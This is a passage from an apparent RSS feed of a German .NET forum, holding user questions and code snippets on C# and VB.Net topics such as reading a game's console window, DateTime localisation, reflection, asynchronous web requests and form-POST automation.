Kostenlos bzw. Kostenpflichtig ist beides willkommen.<br />
<br />
lg,<br />
AFU</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AFU</dc:creator>
			<guid isPermaLink="true">net-94/c-obfuscator-39756</guid>
		</item>
		<item>
			<title>VB.Net Bereits laufende Console auslesen...</title>
			<link>net-94/bereits-laufende-console-auslesen-39501?goto=newpost</link>
			<pubDate>Thu, 15 Jun 2017 17:36:22 GMT</pubDate>
			<description>Hi, 
 
ich würd gern die laufende Console eines Spiels (RocketLeague) auslesen, da in den Logdatein- welche von dieser erstellt werden- die...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich würd gern die laufende Console eines Spiels (RocketLeague) auslesen, da in den Logdatein- welche von dieser erstellt werden- die Informationen die ich brauche nicht enthalten sind.<br />
Die Console ist eine &quot;ConsoleWindowClass&quot;.<br />
Diese Console dürfte eins zu eins wie die CMD-Console sein.<br />
Einen redirect (&quot;RedirectStandardOutput&quot;) kann ich nicht benutzen, da ich die Console nicht starte, sondern das Spiel von selbst.<br />
Daher muss ich mit der FindWindow-API arbeiten, wobei genau das Problem liegt.<br />
<br />
Ich bekomme nur den Titel der Console, nicht den Inhalt ausgegeben...<br />
<br />
Mein Code:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; Private Const WM_GETTEXT As Integer = &amp;HD<br />
&nbsp; &nbsp; Private Declare Function FindWindow Lib &quot;user32.dll&quot; Alias &quot;FindWindowA&quot; (ByVal lpClassName As String, ByVal lpWindowName As String) As IntPtr<br />
&nbsp; &nbsp; Private Declare Auto Function SendMessage Lib &quot;user32.dll&quot; (ByVal hWnd As IntPtr, ByVal msg As Integer, _<br />
&nbsp; &nbsp; ByVal wParam As IntPtr, ByVal lParam As IntPtr) As IntPtr<br />
&nbsp; &nbsp; &lt;DllImport(&quot;user32.dll&quot;, SetLastError:=True, CharSet:=CharSet.Auto)&gt; _<br />
&nbsp; &nbsp; Private Shared Function FindWindowEx(ByVal parentHandle As IntPtr, _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ByVal childAfter As IntPtr, _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ByVal lclassName As String, _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ByVal windowTitle As String) As IntPtr<br />
&nbsp; &nbsp; End Function<br />
<br />
&nbsp; &nbsp; Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Hwnd As IntPtr = FindWindow(&quot;ConsoleWindowClass&quot;, &quot;C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Handle As IntPtr = Marshal.AllocHGlobal(1000)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim NumText As Integer = SendMessage(Hwnd, WM_GETTEXT, 500, Handle)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Text As String = Marshal.PtrToStringUni(Handle)<br />
&nbsp; &nbsp; &nbsp; &nbsp; MsgBox(Text)<br />
&nbsp; &nbsp; End Sub</code><hr />
</div><br />
Dies gibt mir nur den Titel der Console zurück, welchen ich auch verändern kann (das Handle scheint also zu stimmen)...<br />
Hat jemand ne Idee, wie ich an den Inhalt der Console komme?<br />
<br />
Danke im Voraus<br />
<br />
LG<br />
Baumstumpf<br />
<br />
Edit: ChildHandles scheint die Console einfach nicht zu haben :/</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Baumstumpf</dc:creator>
			<guid isPermaLink="true">net-94/bereits-laufende-console-auslesen-39501</guid>
		</item>
		<item>
			<title>Typisierung von C# und Python</title>
			<link>net-94/typisierung-c-python-39491?goto=newpost</link>
			<pubDate>Sat, 10 Jun 2017 14:05:17 GMT</pubDate>
			<description><![CDATA[Laut Wikipedia gehört Python zu den Sprachen mit einer "recht starken Typisierung". Das hat mich verwundert. Bisher habe ich zwar noch nicht in...]]></description>
			<content:encoded><![CDATA[<div>Laut Wikipedia gehört Python zu den Sprachen mit einer &quot;recht starken Typisierung&quot;. Das hat mich verwundert. Bisher habe ich zwar noch nicht in Python entwickelt, dafür aber in PHP. Und PHP hat ja bekannterweise eine sehr schwache, wenn nicht gar als katastrophal zu bezeichnende Typisierung. Ich hielt Python in der Hinsicht mit PHP vergleichbar, da ich in Python-Code bisher noch nie Datentypen gesehen habe, sondern nur Variablen ohne Typisierung wie in PHP. Es scheint, als wird hier noch mal unterschieden zwischen Implizierter und explizierter Typisierung. Implizite Typisierung scheint das zu sein, was PHP macht: Den Typ völlig eigenständig zu erkennen. Daher kann man den Typ einer Variable auch beliebig ändern wie <br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">$foo&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">$foo&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'Test'</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">$foo&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #0000BB">1</span><span style="color: #007700">,</span><span style="color: #0000BB">2</span><span style="color: #007700">,</span><span style="color: #0000BB">3</span><span style="color: #007700">);<br /></span><span style="color: #FF8000">//&nbsp;...&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Das war bisher für mich das ausschlaggebende Argument. Denn so kann ich ja einer Funktion, die z.B. einen Array erwartet, jede anderen Typ übergeben. Das schlägt dann irgendwann fehl, was zu schwer auffindbaren Fehlern führen kann. Nun gibt es aber auch noch die explizite Typisierung: Der Programmierer gibt hier an, um welchen Typ es sich handelt. In stark typisierten Sprachen wie C# scheint beides vorhanden zu sein:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
string name = &quot;Test&quot;;<br />
// Funktioniert nicht, da es sich um einen String handelt<br />
name = 4;<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Sehe ich es richtig, dass es in Python zwar keine explizite Typisierung gibt, aber dafür eine implizierte? Oder mit anderen Worten: Der Typ einer Variable wird zwar nicht ausdrücklich angegeben wie in C#. Python erkennt allerdings den Typ anhand der ersten Zuweisung und lässt es damit nicht zu, dass ich eine Variable als Zahl deklariere, und später einen String in die gleiche Variable schreibe? Damit wäre Python in meinen Augen zwar immer noch fehleranfällig, aber nicht ganz so schlimm wie PHP. In PHP kann man ja wie oben schon beschrieben alles machen, mit entsprechendem Chaos als mögliche Folge.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DotNet</dc:creator>
			<guid isPermaLink="true">net-94/typisierung-c-python-39491</guid>
		</item>
		<item>
			<title>C# DateTime Wochentag in Deutsch übersetzen</title>
			<link>net-94/c-datetime-wochentag-in-deutsch-uebersetzen-39350?goto=newpost</link>
			<pubDate>Sat, 08 Apr 2017 13:41:39 GMT</pubDate>
			<description>Die DateTime-Klasse bietet mit DayOfWeek ein praktisches Enum für alle Wochentage. Ich benötige den Wochentag einer DateTime-Instanz als Bezeichnung...</description>
			<content:encoded><![CDATA[<div>Die DateTime-Klasse bietet mit <i>DayOfWeek</i> ein praktisches Enum für alle Wochentage. Ich benötige den Wochentag einer DateTime-Instanz als Bezeichnung auf Deutsch, also Montag, Dienstag und so weiter. Der String soll dem Nutzer angezeigt werden, daher ist mir eine korrekte Übersetzung wichtig. <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
string weekDayName = DateTime.Now.DayOfWeek.ToString();<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Liefert mir den Tag auf Englisch (Monday, Tuesday, ...). Gibt es eine Lokalisierungsmöglichkeit für .NET, die mir den Tag in der Culture des Users ausgibt? Das würde ich gegenüber einem Workaround bevorzugen, der die Enum-Werte von DayOfWeek in den String des jeweiligen Wochentages mappt.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DotNet</dc:creator>
			<guid isPermaLink="true">net-94/c-datetime-wochentag-in-deutsch-uebersetzen-39350</guid>
		</item>
		<item>
			<title>VB.Net Frage: Vom Login bis zum Chat.</title>
			<link>net-94/frage-vom-login-bis-zum-chat-39267?goto=newpost</link>
			<pubDate>Thu, 23 Feb 2017 23:09:18 GMT</pubDate>
			<description>Nabend liebe Community, 
 
Ich habe mir ein eigenes Forum erstellt wo sich zahlreiche User registrieren können. Nun möchte ich gerne bei VB.Net ein...</description>
			<content:encoded><![CDATA[<div>Nabend liebe Community,<br />
<br />
Ich habe mir ein eigenes Forum erstellt wo sich zahlreiche User registrieren können. Nun möchte ich gerne bei VB.Net ein LogIn verbauen der die User und Passwörter vom Forum<br />
von der Datenbank herausfiltert und ausliest. Bei falschen Angaben, soll denn eine MessageBox kommen mit z.B. folgenden Inhalt: &quot;Benutzername/Passwort falsch!&quot; / &quot;Benutzername nicht registriert&quot;.<br />
Und bei richtigen Angaben soll sich dann die Form2 öffnen und sich automatisch mit einen Chat verbinden mit den registrierten Usernamen vom Forum. Kleinigkeiten was gerne gesehen ist, wenn auch<br />
eine Userlist dabei wäre. WÄRE DAS MÖGLICH? UND GEBE ES EIN TUTORIAL FÜR SOWAS? ODER WÜRDE EINER SICH DIE MÜHE GEBEN MIR SOWAS ZU ERSTELLEN? Ich habe leider viel zu wenig Ahnung von<br />
sowas. Und habe leider auch in der Art auch nichts hier im Forum gefunden. :/ Ich bedanke mich im vorraus! Und freue mich über positive Tipps von euch.<br />
<br />
Sollte mir einer ein Tutorial schreiben oder mir zeigen wie man sowas programmiert oder doch nen' Source Code geben. Für die mühe, gibt es auch eine Belohnung. :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/frage-vom-login-bis-zum-chat-39267</guid>
		</item>
		<item>
			<title>C#/Visual Studio: Zur Implementierung einer Interface-Methode springen</title>
			<link>net-94/c-visual-studio-zur-implementierung-einer-interface-methode-springen-39173?goto=newpost</link>
			<pubDate>Sun, 08 Jan 2017 07:20:00 GMT</pubDate>
			<description>Hi, 
 
ich nutze grade verstärkt Interfaces, die auch zur Übergabe an andere Klassen genutzt werden, statt der Klasse mit der konkreten...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich nutze grade verstärkt Interfaces, die auch zur Übergabe an andere Klassen genutzt werden, statt der Klasse mit der konkreten Implementierung. Mit Visual Studio kann man auf den Datentyp eines Parameters klicken, und gelangt zur Definition der Klasse, wenn F12 gedrückt wird. Das empfinde ich als sehr nützlich und spart viel Zeit, wenn ich an der Klasse etwas ändern möchte. Da ich aber nun ein Interface verwende, funktioniert das ganze nicht mehr: Mit F12 gelange ich zur Definition der Methode im Interface, aber nicht zur konkreten Implementierung. <br />
<br />
Ein Beispiel: <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
    public interface ITest {<br />
        void Foo();<br />
    }<br />
    public class Test : ITest {<br />
        public void Foo() {<br />
<br />
        }<br />
    }<br />
<br />
    public class ImplementionTest{<br />
        public ImplementionTest(ITest test) {<br />
            <br />
        }<br />
    }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Im Konstruktor der Klasse &quot;ImplementionTest&quot; klicke ich auf &quot;Foo&quot; und drücke F12. Jetzt lande ich bei der Definition im Interface. Ich möchte aber bei der Definition der Implementierung landen, also in dem Fall der Foo-Methode in der Klasse &quot;Test&quot;. Ist dies irgendwie möglich? <br />
<br />
Mir ist klar, dass Visual Studio nicht hellsehen kann, welche Implementierung ich möchte, wenn es mehrere gibt. Das ist bei mir aber meistens nicht der Fall. Ich habe nur eine Klasse und halte mich an die Coding Conventions von C#, soll heißen: Das Interface heißt gleich wie die Klasse mit der Implementierung, nur mit einem großen I davor. Im obigen Beispiel beim Interface &quot;ITest&quot; müsste Visual Studio also nach einer Klasse namens &quot;Test&quot; suchen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DotNet</dc:creator>
			<guid isPermaLink="true">net-94/c-visual-studio-zur-implementierung-einer-interface-methode-springen-39173</guid>
		</item>
		<item>
			<title>Alle Eigenschaften eines Objektes in eine andere Instanz kopieren</title>
			<link>net-94/alle-eigenschaften-eines-objektes-in-eine-andere-instanz-kopieren-39025?goto=newpost</link>
			<pubDate>Sun, 30 Oct 2016 16:14:59 GMT</pubDate>
			<description>Ich hatte letztens den Fall, dass ich die Eigenschaften (also öffentliche Propertys) eines Objektes in ein anderes, bereits existerendes Objekt...</description>
			<content:encoded><![CDATA[<div>Ich hatte letztens den Fall, dass ich die Eigenschaften (also öffentliche Propertys) eines Objektes in ein anderes, bereits existerendes Objekt kopieren musste. Clone() und ähnliches fiel damit weg. Das geht im neuen .NET Core nicht mehr wie bisher, weil der System.Reflection Namespace überarbeitet wurde, den man für mein Snippet auch einbinden muss. Trotzdem ist es noch recht schlank, wie die folgende Hilfsmethode zeigt: <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
T CopyAttributes&lt;T&gt;(T sourceObject, T targetObject) {<br />
            var typeInfo = sourceObject.GetType().GetTypeInfo();<br />
            foreach(var property in typeInfo.DeclaredProperties) {<br />
                if(property.CanWrite) {<br />
                    var sourceValue = property.GetValue(sourceObject);<br />
                    property.SetValue(targetObject, sourceValue);<br />
                }<br />
            }<br />
            return targetObject;<br />
        }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Beispiel <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
class MyClass {<br />
    public string A { get; set; }<br />
    public string B { get; set; }<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Von der Klasse erstellt man zwei Instanzen<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
MyClass objectA = new MyClass() { A = &quot;ABC&quot; };<br />
MyClass objectB = new MyClass();<br />
CopyAttributes(objectA, objectB);<br />
// objectB.A hat nun den Wert &quot;ABC&quot;<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Die Schwierigkeit bestand im System.Reflections Namespace, da die Dokumentation für Core hier etwas dürftig ist und auch Intellisense das importieren des Namespace nicht vorschlägt, warum auch immer. Eventuell hilft es ja jemanden der das gleiche Problem hat :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DotNet</dc:creator>
			<guid isPermaLink="true">net-94/alle-eigenschaften-eines-objektes-in-eine-andere-instanz-kopieren-39025</guid>
		</item>
		<item>
			<title>C# Asynchrone Webanfragen</title>
			<link>net-94/asynchrone-webanfragen-38770?goto=newpost</link>
			<pubDate>Tue, 02 Aug 2016 18:54:31 GMT</pubDate>
			<description>Hi Leute, 
 
mit meiner PostRequest()-Methode tätige ich um 10 Webrequests die Sekunde: 
 
        private string pageSource; 
        private...</description>
			<content:encoded><![CDATA[<div>Hi Leute,<br />
<br />
mit meiner <i>PostRequest()</i>-Methode tätige ich um 10 Webrequests die Sekunde:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
        private string pageSource;<br />
        private WebResponse response;<br />
<br />
        public string PostRequest(string url, string formParams)<br />
        {<br />
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);<br />
            request.CookieContainer = container;<br />
            request.Proxy = null; <br />
            request.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
            request.Method = &quot;POST&quot;;<br />
            byte&#91;&#93; bytes = Encoding.ASCII.GetBytes(formParams);<br />
            request.ContentLength = bytes.Length;<br />
<br />
            using (Stream os = request.GetRequestStream())<br />
            {<br />
                os.Write(bytes, 0, bytes.Length);<br />
            }<br />
<br />
            request.BeginGetResponse(new AsyncCallback(finishWebRequest), request); // Mit AsyncCallback<br />
<br />
            using (StreamReader sr = new StreamReader(response.GetResponseStream()))<br />
            {<br />
                pageSource = sr.ReadToEnd();<br />
            }<br />
<br />
            showPageSource(pageSource);<br />
<br />
            return pageSource;<br />
        }<br />
<br />
        private void finishWebRequest(IAsyncResult result)<br />
        {<br />
            response = (result.AsyncState as HttpWebRequest).EndGetResponse(result) as HttpWebResponse;<br />
        }
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Die Methode <i>finishWebRequest() </i>habe ich von Stackoverflow übernommen: <a href="http://stackoverflow.com/questions/202481/how-to-use-httpwebrequest-net-asynchronously" target="_blank" rel="nofollow">c# - How to use HttpWebRequest (.NET) asynchronously? - Stack Overflow</a><br />
<br />
Aber selbst ohne das Asynchrone erziele ich das gleiche Ergebnis. Ist mein Verfahren ohne die <i>finishWebRequest()</i>-Methode vielleicht schon einfach so asynchron? Oder wieso macht das keinen Unterschied? Und gibt es Möglichkeiten die Anfragen noch schneller durchzuführen? Ich nutze übrigens .NET 4.5.2. <br />
<br />
Mein Code ohne asynchrone Vorgehensweise, welcher das gleiche Ergebnis erzielte:<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
        private string pageSource;<br />
        private WebResponse response;<br />
<br />
        public string PostRequest(string url, string formParams)<br />
        {<br />
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);<br />
            request.CookieContainer = container;<br />
            request.Proxy = null; <br />
            request.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
            request.Method = &quot;POST&quot;;<br />
            byte&#91;&#93; bytes = Encoding.ASCII.GetBytes(formParams);<br />
            request.ContentLength = bytes.Length;<br />
<br />
            using (Stream os = request.GetRequestStream())<br />
            {<br />
                os.Write(bytes, 0, bytes.Length);<br />
            }<br />
<br />
            WebResponse response = request.GetResponse();  //Ohne AsyncCallback<br />
<br />
            using (StreamReader sr = new StreamReader(response.GetResponseStream()))<br />
            {<br />
                pageSource = sr.ReadToEnd();<br />
            }<br />
<br />
            showPageSource(pageSource);<br />
<br />
            return pageSource;<br />
        }
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />

</div>
</div>
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Negok</dc:creator>
			<guid isPermaLink="true">net-94/asynchrone-webanfragen-38770</guid>
		</item>
		<item>
			<title>Webseiten steuern?</title>
			<link>net-94/webseiten-steuern-38509?goto=newpost</link>
			<pubDate>Fri, 06 May 2016 18:57:27 GMT</pubDate>
			<description>Hallo Leute, 
 
ich möchte gerne Webseiten automatisch steuern. Mein erster Gedanke dazu ist immer über Windows Forms den Webbrowser mittels...</description>
			<content:encoded><![CDATA[<div>Hallo Leute,<br />
<br />
ich möchte gerne Webseiten automatisch steuern. Mein erster Gedanke dazu ist immer über Windows Forms den Webbrowser mittels SendKeys-Klasse zu steuern. Das ist mir aber zu doof, weil dann das Programm immer im Vordergrund laufen muss.<br />
<br />
Damit das Programm im Hintergrund läuft habe ich mich nun an der WebRequest-Klasse probiert. Testweise habe ich hierzu zwei HTML-Seiten erstellt. Die eine stellt Steuerelemente bereit, und die zweite Seite zeigt einfach nur &quot;Hallo Welt&quot;.<br />
<div class="bbcode_container">
	<div class="bbcode_description">HTML-Code:</div>
	<hr /><code class="bbcode_code"><span style="color:#000080">&lt;html&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#000080">&lt;body&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#FF8000">&lt;form action=<span style="color:#0000FF">&quot;login.html&quot;</span> method=<span style="color:#0000FF">&quot;post&quot;</span>&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#FF8000">&lt;input type=<span style="color:#0000FF">&quot;text&quot;</span> name=<span style="color:#0000FF">&quot;myInput&quot;</span>&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#FF8000">&lt;input type=<span style="color:#0000FF">&quot;submit&quot;</span>&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#FF8000">&lt;/form&gt;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span style="color:#000080">&lt;/body&gt;</span><br />
<span style="color:#000080">&lt;/html&gt;</span></code><hr />
</div>Nun erzeuge ich mittels C# eine POST-Anfrage und lasse mir die Antwort ausgeben:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
            //POST-Anfrage erzeugen<br />
            WebRequest request = WebRequest.Create(&quot;http://127.0.0.1/GetPost/index.html&quot;);<br />
            request.Method = &quot;POST&quot;;<br />
            string postData = &quot;myInput=test&quot;;<br />
            byte&#91;&#93; byteArray = Encoding.UTF8.GetBytes(postData); //Konvertierung zum ByteArray<br />
            request.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
            request.ContentLength = byteArray.Length;<br />
            Stream dataStream = request.GetRequestStream();<br />
            dataStream.Write(byteArray, 0, byteArray.Length);<br />
            dataStream.Close();<br />
<br />
            // Antwort holen<br />
            WebResponse response = request.GetResponse();<br />
            MessageBox.Show(((HttpWebResponse)response).StatusDescription);<br />
            dataStream = response.GetResponseStream();<br />
            StreamReader reader = new StreamReader(dataStream);<br />
            string responseFromServer = reader.ReadToEnd();<br />
            richTextBox1.Text = responseFromServer;<br />
            reader.Close();<br />
            dataStream.Close();<br />
            response.Close();
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Die Antwort zeigt allerdings nur die Startseite (index.php) und nicht die gewünschte Zielseite (login.html). Mein Wunsch ist es ja, nach dem POST-Request weitere Anfragen von Seite 2 (Zielseite) zu tätigen. <br />
<br />
Kann mir an dieser Stelle jemand auf die Sprünge helfen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Negok</dc:creator>
			<guid isPermaLink="true">net-94/webseiten-steuern-38509</guid>
		</item>
		<item>
			<title>Wie nennt man new {} in C#? Anonymes Objekt?!</title>
			<link>net-94/wie-nennt-man-new-in-c-anonymes-objekt-38327?goto=newpost</link>
			<pubDate>Fri, 18 Mar 2016 19:18:17 GMT</pubDate>
			<description><![CDATA[Hi, 
 
ich habe heute eine für mich bis dahin fremde Art gesehen, Objekte ohne Struktur zu erstellen: 
 
object test = new { 
    Name = "Peter", 
  ...]]></description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich habe heute eine für mich bis dahin fremde Art gesehen, Objekte ohne Struktur zu erstellen:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
object test = new {<br />
    Name = &quot;Peter&quot;,<br />
    Age = 24<br />
};<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Das wird scheinbar auch von Microsoft so genutzt, auch in MSDN Artikeln ist es teils zu finden. Leider konnte ich bisher nirgendwo eine fachliche Bezeichnung dafür finden, weil der Artikel nicht über dieses Konstrukt handelte, sondern von etwas anderem, wo dieses Konstrukt lediglich zur demonstrativen Werteübergabe genutzt wird. Wie nennt man so etwas? Ich würde es gefühlt aufgrund der Struktur als <i>Anonymes Objekt</i> bezeichnen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>VW Kaefer</dc:creator>
			<guid isPermaLink="true">net-94/wie-nennt-man-new-in-c-anonymes-objekt-38327</guid>
		</item>
		<item>
			<title>C# ListView Image Item - String verwenden?</title>
			<link>net-94/listview-image-item-string-verwenden-38125?goto=newpost</link>
			<pubDate>Mon, 25 Jan 2016 12:12:32 GMT</pubDate>
			<description>Hallo! 
 
Gibt es die Möglichkeit bei einem Image Item in einer ListView einen String zu verwenden um den Namen des Bildes dort angeben zu können?</description>
			<content:encoded><![CDATA[<div>Hallo!<br />
<br />
Gibt es die Möglichkeit bei einem Image Item in einer ListView einen String zu verwenden um den Namen des Bildes dort angeben zu können?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Devon</dc:creator>
			<guid isPermaLink="true">net-94/listview-image-item-string-verwenden-38125</guid>
		</item>
		<item>
			<title>Auf externe Flash-Inhalte zugreifen?</title>
			<link>net-94/auf-externe-flash-inhalte-zugreifen-37828?goto=newpost</link>
			<pubDate>Sun, 22 Nov 2015 13:21:02 GMT</pubDate>
			<description>Moin moin, 
 
ist es mit C# irgendwie möglich, in externen Flash-Anwendungen bestimmte Vorgänge zu erzeugen? 
 
Ich möchte das zum Beispiel auf...</description>
			<content:encoded><![CDATA[<div>Moin moin,<br />
<br />
ist es mit C# irgendwie möglich, in externen Flash-Anwendungen bestimmte Vorgänge zu erzeugen?<br />
<br />
Ich möchte das zum Beispiel auf folgendem Online-Spiel tun: <a href="http://www.haxball.com/" target="_blank" rel="nofollow">HaxBall - Play</a><br />
<br />
Zum Beispiel automatisches einloggen, Channel betreten oder ähnliches. Ich habe es zuvor mit manipulierten Mausklicks bewältigt. Die sind mir aber eher etwas unzuverlässig, da sich die Pixel-Position immer ändern kann: andere Auflösung, Programm an andere Bildschirmposition verschoben, o.Ä.<br />
Zudem muss das Programm so immer im Vordergrund laufen.<br />
<br />
Hat hier jemand vielleicht ein zwei Schlagwörter, Links oder Tipps?<br />
<br />
Lieben Gruß</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Negok</dc:creator>
			<guid isPermaLink="true">net-94/auf-externe-flash-inhalte-zugreifen-37828</guid>
		</item>
		<item>
			<title>VB.Net Share-Online.biz Datei-Upload per API</title>
			<link>net-94/share-online-biz-datei-upload-per-api-37784?goto=newpost</link>
